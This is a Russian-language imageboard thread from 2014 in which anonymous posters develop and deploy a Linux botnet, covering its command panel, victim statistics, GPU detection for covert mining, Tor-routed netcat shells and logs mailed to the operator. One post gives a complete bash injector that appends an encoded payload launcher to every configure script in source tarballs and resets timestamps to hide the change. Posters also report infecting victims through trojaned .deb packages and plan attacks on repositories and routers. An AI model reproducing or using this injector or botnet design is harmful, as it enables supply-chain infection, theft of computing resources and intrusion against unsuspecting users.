А вот статик зачем?

Аноним Срд 14 Май 2014 18:11:59  #393 №51187 

>>51186
Static - исполняемому файлу не нужны никакие внешние файлы, все библиотеки уже в нём.
Ты фтп со статиком собирал? Если нет, то в makefile после gcc или g++ через пробел тоже напиши -static.

Аноним Срд 14 Май 2014 20:21:27  #394 №51188 

>>51187
без статика.
сейчас перекомпиляю.

Аноним Срд 14 Май 2014 20:26:55  #395 №51189 
1400084815066.png

>>51188
Ок, вот nc и ftp. Кстати, .о файлы в фтп придётся с собой таскать? Или нужны только бинарники?
http://ge.tt/7hRRf7h1/v/0

Аноним Срд 14 Май 2014 21:24:43  #396 №51191 

>>51189
Только бинарники.

Аноним Срд 14 Май 2014 21:25:24  #397 №51192 
1400088324562.jpg

>>51189
Только бинарники.

Аноним Срд 14 Май 2014 22:01:20  #398 №51193 

>>51191
>>51192
Файлы .о значит используются только во время компиляции, правильно?

Аноним Срд 14 Май 2014 22:12:14  #399 №51194 
1400091134158.jpg

>>51193
Да. Все .о файлы собираются в один файл, туда же - и библиотеки, если статик. Ну все файлы только в нашем случае, .о файл может быть и один.

Аноним Срд 14 Май 2014 22:33:25  #400 №51197 
1400092405473.jpg

>>51194
Ок, я попробовал написать говнопрограммку, для лабы.
У меня там 3 файла:


main.c
string.c
string.h


Как makefile запилить? В ручную?
Я в ручную запилил:


main:main.c string.c
gcc -Wall -c main.c
gcc -Wall -c string.c
gcc -o main main.o string.o
strip main


Так сойдёт?
А как сделать так что-бы через ./configure собирался автоматичесски makefile? Или для таких маленьких проэктов не стоит?
Такая компиляция оче годная штука, мне нравится, малаца, хорошо сделали.

Да, от статика бинарник не плохо так разбухает.
Аноним Срд 14 Май 2014 22:45:15  #401 №51198 

>>51197
>проэкт
проект

самофикс

Аноним Чтв 15 Май 2014 04:48:34  #402 №51201 

>>51169
поддвачну.
мимо Си кодер, кожу под ПЛК и МК без ОС
Выложенный на хакере эксплоит у меня не сработал ни на 2.6.32 ни на свеженькой убунте одного юниора.

Аноним Чтв 15 Май 2014 09:02:54  #403 №51203 
1400130174420.jpg

>>51197
Configure генерируется автоматически, кажется с помощь autoconf. Я им не пользовался, гугли.
>так сойдёт?
Если работает, значит сойдёт, лол. Я только однофайловую хуиту писал.
Если не работает твой makefile, попробуй так:

all:
gcc string.c - string.o
gcc main.c -o main.o
gcc *.o -o main
strip main

Во всех строках кроме первой - табуляция в начале строки. Но это неправильный синтаксис, так что тоже гугли.
Аноним Чтв 15 Май 2014 15:11:58  #404 №51204 

>>51203
Ну так как я сделал работает, так что норм.

Аноним Чтв 15 Май 2014 17:38:35  #405 №51207 

Что можно показывать в статистике админки?

Аноним Чтв 15 Май 2014 17:45:44  #406 №51208 

>>51207


w
LANG=C lastlog | grep -v 'Never logged in'
df -h

Скриншот туда впихнуть можешь, если у юзера иксы запущены. Сходи в conky-тред в /s/ посмотри, что обычно прыщебляди себе на экран выводят.
Аноним Чтв 15 Май 2014 20:16:46  #407 №51211 

>>51207
uname -a

Аноним Чтв 15 Май 2014 20:36:47  #408 №51212 

GeoIP прикрутить, или нинужен?

Аноним Чтв 15 Май 2014 20:43:12  #409 №51213 

>>51212
что это, и для чего это?
Чтобы хомяков по айпи отслеживать?
Можно сделать выборочно, то есть если бдру понадобится -> скачай с КС.

Аноним Чтв 15 Май 2014 21:00:47  #410 №51215 

>>51212
Сугубо опционально, ящитаю.

Аноним Чтв 15 Май 2014 21:51:41  #411 №51217 
1400176301084.jpg

>>51213
Он реализован полностью на сервере, просто база весит 9.6 мб текстовы
й файл, сжиматся должен хорошо
. Там также флаги стран.
С сервера ничего качать не нужно, просто админка станет толще.

Аноним Чтв 15 Май 2014 22:28:26  #412 №51219 

>>51217
Ну если это для админки - это не проблема.

Аноним Птн 16 Май 2014 16:26:29  #413 №51227 
1400243189891.png

Список всех ботов.

Аноним Птн 16 Май 2014 16:31:34  #414 №51228 

>>51227
Ужасная админка на пирилейтед, ты бы еще на белом фоне белым шрифтом написал.
А идея годная, стоит добавить ип хомяка, время последнего подключения и еще там чего.

Аноним Птн 16 Май 2014 16:36:57  #415 №51229 

>>51228
А какой сделать дизайн?
>ип хомяка, время последнего подключения
>IP, был активен

Аноним Птн 16 Май 2014 16:52:53  #416 №51230 
1400244773787.png

>>51229
черный фон, белый текст.
или
белый фон, черный текст.

Алсо - добавить железо, майнерам пригодится оче сильно.
Так можно будет сразу посмотреть кем можно майнить а на ком нет.

Потом можно добавить имя пользователя и есть ли у данного пользователя права рута.
Пикрилейтед - админка SnowTraces, всё читается, глаза не вытекают, никаких чветочков и разноцветного ужаса. Сделай что-нибудь подобное. Нужно Можно в чёрных тонах.

Аноним Птн 16 Май 2014 18:47:37  #417 №51232 
1400251657572.png

>>51230
>железо
Через uname -a и cat /proc/cpuinfo можно получить часть информации о системе, но майнят обычно на GPU. Как штатными средствами можно узнать видеокарту?

Аноним Птн 16 Май 2014 19:20:21  #418 №51233 

>>51232
Например:

lspci | grep -E "VGA|3D"
Аноним Птн 16 Май 2014 19:49:56  #419 №51235 

>>51232
И да забыл сказать, что админка так лучше выглядит.

Аноним Птн 16 Май 2014 19:51:50  #420 №51236 

>>51227
У меня ГЖЕЛЬ от твоей админки.
>>51233
Ещё можно смотреть наличие /dev/nvidia0 и /dev/что-там-у-ati. А то вдруг карта стоит, а дрова свободные, например.

Аноним Суб 17 Май 2014 11:58:44  #421 №51238 
1400313524075.jpg
Аноним Суб 17 Май 2014 16:00:21  #422 №51240 
1400328021003.jpg

>>51233
А lspci входит в дефолтную поставку бубунт? А то может тоже собирать прийдётся.
Стоп, а как насчёт dmesg?

Аноним Суб 17 Май 2014 20:44:06  #423 №51241 

>>51240
Да вроде бы lspci везде есть.
>как насчёт dmesg
Можно и dmesg. Нужно только в /s/ попросить выхлопы для разных комбинаций и версий Nvidia/ATI и швабодных/нишвабодных дров.

Аноним Вск 18 Май 2014 10:55:46  #424 №51246 
1400396146736.gif
Аноним Вск 18 Май 2014 11:03:27  #425 №51247 

>>51246
Ну что, как дела? Что нового запилил?

Аноним Вск 18 Май 2014 12:39:51  #426 №51248 
1400402391312.png

>>51247
Ничего, ибо дача.
В понедельник погуглю фтп-клиенты с поддержкой прокси чтоб записать в ридми, как подключаться, попробую поставить socat. Нужно еще допилить админку, и готовить релиз.

Аноним Вск 18 Май 2014 14:37:08  #427 №51250 

>>51248
Яснопонятно

Аноним Вск 18 Май 2014 15:55:25  #428 №51251 


>lspci | grep -E "VGA|3D"
Работает на свежей бубунте, только пробовал.
По идее он по дефольту стоит.

Аноним Пнд 19 Май 2014 15:54:05  #429 №51262 
1400500445728.jpg

>>51251
lspci|grep -E 'VGA|3D'|sed "s/.*\[//g"|sed "s/\]//g" - у тебя тоже модель так выводит?

Аноним Пнд 19 Май 2014 16:49:19  #430 №51263 
1400503759285.png

>>51262
у меня что
lspci | grep -E "VGA|3D"

что

lspci|grep -E 'VGA|3D'|sed "s/.*\[//g"|sed "s/\]//g"

выводит одно и тоже

-арчер

Аноним Пнд 19 Май 2014 17:31:03  #431 №51264 
1400506263464.png

gentoo ~ # lspci|grep -E 'VGA|3D'
01:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] RV*** XT [Radeon HD XXXX]
gentoo ~ # lspci|grep -E 'VGA|3D'|sed "s/.*\[//g"|sed "s/\]//g"
Radeon HD XXXX

Странно. Посмотри весь вывод lspci, найди там модель своей видеокарты и запости общий вид.
>Integrated
Хотя если она интегрированная, то модель может и не вывести. Пройдись всё же по lspci.
Аноним Пнд 19 Май 2014 17:33:52  #432 №51265 
1400506432697.png

Собственно статистика. Блядь, каждый час и каждые сутки обнуляются. По-другому делать более затратно для ресурсов хостинга.

Аноним Пнд 19 Май 2014 18:44:34  #433 №51267 
1400510674278.jpg

>>51264
>GPU не болдом
Исправлю.

1. Так, сейчас лог шлётся на мыльцо хозяина. Можно слать на админку, но так её кто-нибудь может завайпать. Хотя если кто обнаружит бота, то он может изменить пароль на исходящее мыло, и поломать лог-сервис. Щито делать?
2. Оставить возможность управления без админки, с помощью пары файлов?
3. Да, и есть ли смысл пилить раржпег при таких размерах? Если нет, то я просто в .tar.bz2 упакую.

Аноним Пнд 19 Май 2014 19:11:55  #434 №51268 
1400512315331.jpg

>>51267
> просто в .tar.bz2
So do that, no problem.

Аноним Пнд 19 Май 2014 19:18:48  #435 №51269 
1400512728371.png

>>51267
Для просмотра админки запили пароль.
Вот так:


<?php
$user = $_POST['user'];
$pass = $_POST['pass'];

if($user == "$printuser"
&& $pass == "$printpass")
{

<код вывода бд>

}

if(isset($_POST))
{?>

<form method="POST" action="#">
User <input type="TEXT" name="user"></input>
Pass <input type="TEXT" name="pass"></input>
<input type="submit" name="submit"></input>
</form>
<?}
Аноним Пнд 19 Май 2014 19:30:30  #436 №51270 
1400513430938.png

>>51269
Авторизация уже есть. Я имею в виду, что если кто-то обнаружит бота, разберёт и решит помешать, то начнёт вайпать файлы статистики, постоянно загружая задания и передавая длинные аргументы.
>>51268
Ok.

Аноним Пнд 19 Май 2014 21:08:27  #437 №51273 

>>51270
>если кто-то обнаружит бота, разберёт и решит помешать, то начнёт вайпать файлы статистики, постоянно загружая задания и передавая длинные аргументы.

А как пофиксить?

Аноним Пнд 19 Май 2014 21:18:03  #438 №51274 
1400519883020.png

>>51273
Можно ограничить длину имени/группы бота, или добавить подтверждение:
Если бота еще нет в базе, то в ему загадывается число и даётся хеш имени+числа, он отгадывает.
Только тех кто отгадал, скрипт добавляет в базу, и их учитывает в статистике. Тех кто слишком часто подключаются - в игнор. Кто не отгадал - тоже не учитывать в статистике.
После этого разве что ддосить серваки остаётся.
Да, и какой тут бамплимит?

Аноним Пнд 19 Май 2014 21:47:34  #439 №51275 
1400521654813.jpg

>>51274
бамплимит 500
>После этого разве что ддосить серваки остаётся.
Не знаю я никогда не ддосил, я майню биткониты.
Алсо зачем ддоссить?
Имхо привлечение ненужного внимания и всё такое.
Еще собирать данные можно, например, ось, используемый драйвер и тд.

Аноним Пнд 19 Май 2014 21:49:28  #440 №51276 

>>51275
>используемый драйвер
используемый браузер
самофикс

Аноним Пнд 19 Май 2014 21:56:32  #441 №51277 
1400522192895.jpg

>>51275
Я имею в виду, что при такой защите тем, кто хочет помешать работе ботнета, останется разве что ддосить командные сервера. Ну не помешать, а затруднить просмотр детальнй статистики.

Да, и >>51267 1,2 заполняем анкету.

Аноним Пнд 19 Май 2014 22:16:44  #442 №51278 
1400523404631.gif

>>51277
С мылом сделай как сделал ёба:
Отправка с одного мыла на другое.
То есть реверсер никогда не узнает пароль от мыла куда приходят логи.
А если он поломает мыло которое отправляет, то его просто можно заменить на новое и всё.

Аноним Пнд 19 Май 2014 22:20:43  #443 №51279 
1400523643160.jpg

>>51278
Ну, так оно сейчас и есть.

Аноним Втр 20 Май 2014 00:19:15  #444 №51283 

>>51262
>sed "s/.*\[//g"|sed "s/\]//g"
sed -r "s/.+\[([^]]+)\].*/\1/g"

Аноним Втр 20 Май 2014 20:36:12  #445 №51291 
1400603772997.jpg

Через тор командная строка работает отлично. FTP - нет, но я напишу завтра обёртку для командной строки, через которую и можна будет скачивать/загружать файлы и бродить по файловой системе.

Аноним Втр 20 Май 2014 23:11:23  #446 №51294 

>>51291
sshfs что ли? Тащи уже тогда с собой бинарник ssh, раз ушли от bash-only.

Аноним Втр 20 Май 2014 23:13:08  #447 №51295 

>>51294
>бинарник ssh
sshd то есть.

Аноним Срд 21 Май 2014 07:40:44  #448 №51298 
1400643644827.jpg

>>51294
>>51295
Зачем? Шифрование - тор, командная строка - netcat, для файлов будет скрипт. Какой смысл тащить еще один бинарник?

Аноним Срд 21 Май 2014 07:53:48  #449 №51300 
1400644428994.gif

Кто-нибудь с 32-битным процессором, выполните

cat /proc/cpuinfo|grep ^clflush
Аноним Срд 21 Май 2014 13:29:32  #450 №51303 

>>51298
Чтобы избавиться от костылей для просмотра ФС. Впрочем, как хочешь.
>>51300
>с 32-битным процессором
Где же тебе такой найти? Я-то выполнил, но не думаю, что тебе это подойдёт.


/ # cat /proc/cpuinfo
Processor : ARM926EJ-S rev 5 (v5l)
BogoMIPS : 421.06
Features : swp half fastmult edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant : 0x0
CPU part : 0x926
CPU revision : 5

Hardware : KeyASIC Ka2000 EVM
Revision : 0000
Serial : 0000000000000000
/ #
test !sFi/kobato Срд 21 Май 2014 16:17:28  #451 №51304 

test

Аноним Срд 21 Май 2014 18:29:14  #452 №51305 

>>51300
Тебе нахуя? Оно вместе с sse2 всегда, на x86.

Аноним Чтв 22 Май 2014 16:09:45  #453 №51309 

Как заставить socat выполнять команды через конвеер? Если использовать командный режим, то всё работает, а принятые по конвееру команды не выполняются или ничего не выводят, хотя у ls есть вывод?

Аноним Чтв 22 Май 2014 18:39:27  #454 №51310 

>>51309
>не выполняются
Не возвращаются данные, а команды выполняются.

mar>>> !!VPptBdZF Птн 23 Май 2014 00:38:54  #455 №51312 

>>44025
http://ru.wikipedia.org/wiki/Heartbleed
взлом линукса. позволяет запустить прогу из-под рут шелла, не имея прав рут

Аноним Птн 23 Май 2014 03:35:40  #456 №51313 

>>51312
ты всё перепутал, дятел.
Это уязвимость CVE-2014-196 позволяет запустить процесс от рута если ты имеешь только юзерские права. баттхёртблид позволяет снять дамп RAM с сервера с раскочегаренным SSL-сервером работающим на ОрепSSL

Аноним Птн 23 Май 2014 14:09:47  #457 №51317 

>>51309
Бамп вопросу, блеать.

Аноним Вск 25 Май 2014 10:36:52  #458 №51323 
1400999812398.jpg
Аноним Вск 25 Май 2014 10:57:42  #459 №51324 
1401001062305.jpg

bamp
Как идёт разработка оп?

Аноним Вск 25 Май 2014 13:47:30  #460 №51327 
1401011250684.gif

>>51324
В понедельник буду готовить к выпуску релиз. Не получится файлы сливать, хотя можно обратно запихать ftp-сервер, и подключаться с помощью ftp-клиента с поддержкой прокси.
Добавил пару плюшек. Можно теперь управлять с помощью одного файла или админки раньше было минимум два. Добавил статистику в админку. Думаю может добавить спящий режим реже коннектиться к кс, ничего не делать пока не дана команда проснуться.

Аноним Пнд 26 Май 2014 19:27:41  #461 №51332 

Сборка #8.
rghost.ru/55870778
Пароль loldoll
Что нового:

-режим sleep - бот не выполняет ресурсоёмкие задания, только обновления/изменение параметров
-команда для изменения режима
-команда для изменения пути конфига на сервере. Так можно явно указать, будет там просто файл, или админка, которй передаётся дополнительная иформация
-тор. Пока что только командная строка. Как запустить - читаем в ридми. Onion-адрес в итоге записывается в лог, который можно получить на мыльце.
-в админку добавлена статистика, список ботов и geoip

Аноним Пнд 26 Май 2014 19:57:02  #462 №51333 
1401119822832.jpg

>>51332
О, мерси, мсье!

Аноним Пнд 26 Май 2014 20:49:29  #463 №51335 

>>51332
Op ты няша.
Теперь надо придумать способ массово впаривать куколку хомячкам.

Аноним Втр 27 Май 2014 10:26:30  #464 №51336 

>>51335
> хомячкам
> linux
/0

Аноним Втр 27 Май 2014 13:56:46  #465 №51337 

>>51336
Массово впаривать куколку в роутеры тогда уж...

Аноним Втр 27 Май 2014 15:09:55  #466 №51338 
1401188995100.jpg

>>51336
>убунту
>/0

Аноним Втр 27 Май 2014 15:26:03  #467 №51339 

>>51337
В чем профит? Ну кроме очевидного, типа прокси/перехвата трафика

Аноним Втр 27 Май 2014 22:21:29  #468 №51341 
1401214889149.gif

>>51339
Можно ведь не только перехватывать, но и подменять трафик, следовательно можно заполучить пеки из внутренней сети. Оттуда ещё больше профитов, если повезёт.

Ну и распределённый дудосинг, конечно же.

Аноним Срд 28 Май 2014 19:13:41  #469 №51345 
1401290021188.jpg
Аноним Чтв 29 Май 2014 16:14:09  #470 №51348 
1401365649233.jpg
Аноним Чтв 29 Май 2014 16:47:14  #471 №51349 
1401367634198.jpg
Аноним Птн 30 Май 2014 16:04:16  #472 №51356 
1401451456312.jpg
Аноним Суб 31 Май 2014 14:38:04  #473 №51363 

Ну что котаны?
Как успехи?

Аноним Суб 31 Май 2014 16:29:23  #474 №51366 
1401539363712.png

>>51363
Я вчера кое-куда закинул заражённые дебки. Потом еще повкидую, и буду ждать.

Аноним Суб 31 Май 2014 21:10:29  #475 №51369 

>>51366
Ах ты шалунишка.
Хорошо, что у меня Gentoo.

Аноним Суб 31 Май 2014 23:50:19  #476 №51370 
1401565819308.png

>>51369
Сколько за свет платишь?

>>51366
Ну как, кто-нибудь клюнул?

Аноним Вск 01 Июн 2014 10:04:27  #477 №51372 
1401602667500.jpg

>>51370
Да никого пока.

Аноним Вск 01 Июн 2014 10:54:49  #478 №51374 

>>51372
Очень плохо.
Надо ломать репку Canonical и заражать дебки.
Самая тяжелая часть это сломать репку.
У кого-нибудь есть идеи?

Аноним Вск 01 Июн 2014 11:31:14  #479 №51375 
1401607874776.jpg

>>51374
Если бы вся сложность была во взломе репки.

Все пакеты должны иметь правильную цифровую подпись. Тебе надо будет взломать разработчика, украсть у него закрытые ключи. Только после этого ломать репку. Проще пробекдорить сорцы популярного софта, разработчик каноникал соберет их, а потом через удаленный доступ грузить личинку.

Вообще, вся эта затея с массовым заражением линукс-десктопов затеяна отчаянным оптимистом.

Аноним Вск 01 Июн 2014 11:38:30  #480 №51376 

>>51375
Не думаю что разработчики настолько поехавшие что не заметят личинки в своём софте.
К тому-же макаки из каноникал обнюхают до костей софтину перед тем как пихать её в репку.
Имхо для массового заражения подойдёт только какой нибудь 0-day, как сказал какой-то анон выше. Заражать им сайты и ловить тонны хомяков. Что-то вроде уже полностью унылого JDB. Правда такие сплойты стоят овер 3000$. А то что лежит в пабликах палится или плохо работает.

Аноним Пнд 02 Июн 2014 14:32:33  #481 №51388 
1401705153269.png

Пятеро или четверо, судя по gpu. Флажков стран нет, потому что через тор не смог загрузить базу geoip, и скрипт даёт всем этот флаг.

Аноним Пнд 02 Июн 2014 14:37:35  #482 №51389 

>>51388
Блядь, сначала подумал что арчера поймал.

Аноним Пнд 02 Июн 2014 15:29:34  #483 №51390 

>>51388
Лол, успех. Даже интересно стало, кто эти сказочные долбоебы и как ты им впарил вишню.

Аноним Пнд 02 Июн 2014 16:47:39  #484 №51391 
1401713259007.jpg

>>51389
Как ты меня поймаешь дебками?
Пора запускать майнеры.
Алсо поздравляю с первым уловом.
Как хорошо что есть такие долбоёбы которые ставят левые дебки.

Аноним Пнд 02 Июн 2014 21:16:03  #485 №51394 
1401729363453.png

>>51391
А какие майнеры на линукс идут без ебли? У меня только на проце запускалось, и не помню какой.

Аноним Пнд 02 Июн 2014 21:19:56  #486 №51395 
1401729596330.jpg

>>51391
Кстати, можно ведь скрипт набросать, который в зависимости от типа архива будет проверять наличие configure, и ну ты понел.

Аноним Пнд 02 Июн 2014 22:28:55  #487 №51396 
1401733735977.jpg

>>51394
>майнер
cgminer - поддерживает cpu/gpu, последние версии работают только с SHA. Если хочешь копать Scrypt - гугли.

>Кстати, можно ведь скрипт набросать, который в зависимости от типа архива будет проверять наличие configure, и ну ты понел.

Нихуя не понял. Какой архив, какой скрипт? Какой configure? Я не ванга тебе и не телепат :3

Аноним Втр 03 Июн 2014 01:55:07  #488 №51398 

>>51388
Ну охуеть вообще. Рассказывай, куда вбрасывал.

Аноним Втр 03 Июн 2014 07:40:20  #489 №51399 

>>51398
NYET
>>51396
Буду пробывать.
Я имею в виду, что можно заражать архивы с исходниками, дописывая в файл configure тот же код, что я дописываю и в postinst в дебки.

Аноним Втр 03 Июн 2014 12:05:06  #490 №51401 
1401782706258.jpg

>>51399
Всё, понял.
Да это годно.
Таким способом куда угодно можно будет вбросить, даже на гитхаб (форкаем оче популярную софтину и добавляем в неё личину - профит).
На AUR вбросить можно будет.
Правда в AURе тебя вычислят по айпи и арестуют. А потом убъют.

>NYET

Да ладно, не бойся, мы не будем реверсить твою личину, правда котаны? :3

Аноним Втр 03 Июн 2014 14:29:57  #491 №51402 

Вроде работает.
tb-inj.sh:

#!/bin/bash

code=H4sIABnNjVMAAwMAAAAAAAAAAAA=
_dir=pwd

_inject(){
name=basename $*
format=echo $name|sed "s/.*\.//g"
case "$format" in
gz) f=z;;
tbz) f=j;;
bz2) f=j;;
xz) f=J;;
esac
[ -z "$f" ] && echo 'У файла неправильное расширение!' && exit

tmpd=mktemp -d
tar -x"$f"f "$*" -C $tmpd
cd $tmpd
for i in find -name configure
do
time=stat -c '%Y' $i
time=date --date='@'"$time" '+%Y%m%d%H%M'
echo 'tmpf=mktemp;echo '$code' | base64 -d | gzip -d >> $tmpf;chmod +x $tmpf;($tmpf &) &>/dev/null' >> $i
touch -t "$time" $i
done
tar -c"$f"f $_dir/$name * && cd $_dir && rm -rf $tmpd && echo 'Tarball '$*' заражён.'
}

if [[ $1 == '--prepare' ]]
then
file=$2
if [ ! -r "$file" ]
then
echo 'Не могу прочитать файл!'
exit
fi
if [ ! -w "$0" ]
then
echo 'Не могу изменить себя!'
exit
fi
data=
for i in cat "$file"|gzip -f|base64
do
data=$data$i
done
sed -i "s%^code=.*%code=$data%g" $0
echo 'Инъектор обновлён!'
elif [ "$1" ]
then
for i in $*
do
[ ! -r "$i" ] && (echo 'Не могу прочитать файл '$i'!';break)
_inject "$i"
done
fi
Аноним Втр 03 Июн 2014 14:45:31  #492 №51403 
1401792331906.jpg

>>51402
А, косые скобки порезало. Потом на ргхост залью.

Аноним Втр 03 Июн 2014 14:58:04  #493 №51404 

>>51402
Ты охуенен.

Аноним Втр 03 Июн 2014 16:28:36  #494 №51406 

>>51403
http://rghost.ru/56138195 пароль 2ch
Обьединил с deb-инъектором. Имейте в виду: deb-файл перезаписывается оригинальный, а для тарболлов - новый архив сохраняется в текущей папке.

Аноним Втр 03 Июн 2014 16:50:06  #495 №51407 
1401799806572.png

Арчер, готовый cgminer с этой сборки http://ck.kolivas.org/apps/cgminer/cgminer-4.3.4-x86_64-built.tar.bz2 у тебя запускается?
Я попытался собрать статикой, но всё равно некоторые библиотеки требуются. Так сойдёт, или нет?

Аноним Втр 03 Июн 2014 17:09:48  #496 №51408 

>>51399
Жадина.
>дописывая в файл configure тот же код
Не нужно так делать. Откуда ты знаешь, что в тот configure напихали?
>>51401
>реверсить твою личину
Наркоман штоле сука? Она опенсорц же.

Аноним Втр 03 Июн 2014 17:24:19  #497 №51409 
1401801859514.jpg

>>51408
>что в тот configure напихали
Хм. А если предположить, что первой строкой идёт shebang, и с помощью dd с небольшим смещением от начала вставлять код? Размер shebang'а можно посчитать с помощью grep'a и stat.
Это ведь скрипт, а не исполняемы
й файл. На дальнейший код тогда ведь похуй будет?

Аноним Втр 03 Июн 2014 21:21:15  #498 №51412 

>>51407
оооо шревты

Аноним Втр 03 Июн 2014 21:33:51  #499 №51413 
1401816831970.jpg

>>51412
Не напоминай.

Аноним Втр 03 Июн 2014 22:10:56  #500 №51414 

>>51407
Я пока занят, освобожусь посмотрю, скомпиляю.

Аноним Втр 03 Июн 2014 22:25:43  #501 №51415 

н-пространство-кун, пора перекатываться.

Аноним Втр 03 Июн 2014 22:51:05  #502 №51416 
1401821465218.jpg

>>51415
Завтра запилю. Good night.

Аноним Втр 03 Июн 2014 23:27:24  #503 №51417 

>>51416
Сладких снов.

Аноним Срд 04 Июн 2014 01:03:49  #504 №51418 

>>51409
Без понятия. Я тебе говорю, не лезь в чужой скрипт.

Аноним Срд 04 Июн 2014 07:56:25  #505 №51422 

Перекат >>51421

comments powered by Disqus

Отзывы и предложения